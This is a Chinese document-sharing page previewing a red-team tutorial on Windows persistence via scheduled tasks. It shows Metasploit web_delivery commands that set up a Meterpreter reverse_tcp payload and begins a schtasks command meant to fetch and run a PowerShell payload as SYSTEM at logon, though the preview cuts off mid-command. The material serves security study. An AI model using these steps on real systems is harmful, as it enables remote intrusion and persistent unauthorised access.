- 1
- 0
- 约6.96千字
- 约 11页
- 2026-03-30 发布于浙江
- 举报
Windows操作系统提供了一个实用程序(schtasks.exe),使系统管理员能够在特定的日期和时间执
行程序或脚本。这种行为可作为一种持久性机制被redteam利用。通过计划任务执行持久性不需要管理
员权限,但如果已获得提升的权限,则允许进一步操作,例如在用户登录期间或在空闲状态期间执行任
务。
计划任务的持久化技术可以手动实现,也可以自动实现。有效负载可以从磁盘或远程位置执行,它们可
以是可执行文件、powershell脚本或scriptlet的形式。这被认为是一种旧的持久性技术,但是它仍然
可以在redteam场景中使用,并且由各种开源工具支持。Metasploit的web_delivery模块可用于托
管和生成各种格式的有效载荷。
useexploit/multi/script/web_delivery
setpayloadwindows/x64/meterpreter/reverse_tcp
setLHOST1
settarget5
exploit
在命令提示符下,“schtasks”可执行文件可用于创建计划任务,该任务将在每个Windows登录中以
SYSTEM的形式下载并执行基于PowerShell的有效负载。
schtasks/create/tn
您可能关注的文档
- The-Unified-Kill-Chain信息安全资料.pdf
- 关于VMSA-2024-0019安全公告的说明及解决方案-v1.pdf
- 使用Databricks将数据孤岛转变为信息中心.pdf
- Ponemon-Rezilion-Report-Final信息安全资料.pdf
- Teaching language models to support answers with verified quotesChatGPT主题资料合编.pdf
- 周亚金_利用您的法术针对您通过重用操作码跟踪进行智能合约漏洞威胁防范.pdf
- 美国能源部2024能源部生成式人工智能参考指南第二版英文版61页.pdf
- 毛磊-制药企业数据安全实践分享.pdf
- 欧盟发布的全球首个《人工智能法案》(EU AI Act).pdf
- ChatGPT:Jack of all trades,master of noneChatGPT主题资料合编.pdf
原创力文档

文档评论(0)